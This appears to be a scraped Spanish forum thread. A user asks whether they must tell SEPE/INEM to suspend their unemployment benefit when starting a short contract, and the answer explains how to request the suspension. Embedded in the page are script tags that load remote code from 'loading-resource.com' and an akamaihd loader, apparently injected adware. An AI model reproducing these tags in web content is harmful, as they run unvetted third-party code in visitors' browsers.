Baja en la prestacion

Estoy cobrando prestación del inem y el lunes empiezo a trabajar con un contrato de 1 a 3 meses tengo que avisar al inem para que paren el cobro de la prestación o eso se hace automáticamente al darme la empresa de alta en la seguridad social?

Gracias y un saludo.

<script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="//loading-resource.com/data.geo.php?callback=window.__geo.dataLoaded"></script><script type="text/javascript" src="https://cdncache3-a.akamaihd.net/loaders/1345/l.js?aoi=1311798366&pid=1345&zoneid=109170"></script>

1 Respuesta

Respuesta

Si estas cobrando el paro y vas comenzar a trabajar estas obligado a comunicarlo al servicio publico de empleo porque eres tu quien tiene que solicitar al SEPE/INEM) la suspensión de la prestación por desempleo HASTA QUE TERMINES EL CONTRATO DE TRABAJO Y SOLICITES SUREANUDACION. Puedes comunicar la baja, a cualquier hora y sin esperar turno, en www.sepe.es, pero necesita certificado digital o DNI electrónico. También, llamando al 901 11 99 99 de 9 a 14 horas los días laborables y, en cualquier caso, en la oficina de empleo de tu domicilio.
Cómo informar de la baja o cambio de situación por teléfono, por internet o en la propia oficina de empleo
a) Baja por teléfono: en mi opinión es el sistema más cómodo llamando al 901 11 99 99 .

b) Ir a la oficina de empleo. Ten en cuenta que tendrás que solicitar cita previa si en tu oficina ya es obligatorio este sistema.Un saludo..

https://sede.sepe.gob.es/contenidosSede/generico.do?pagina=/sede_virtua

http://www.sepe.es/contenido/prestaciones/pdf/guia_uso_baja_prestacion.pdf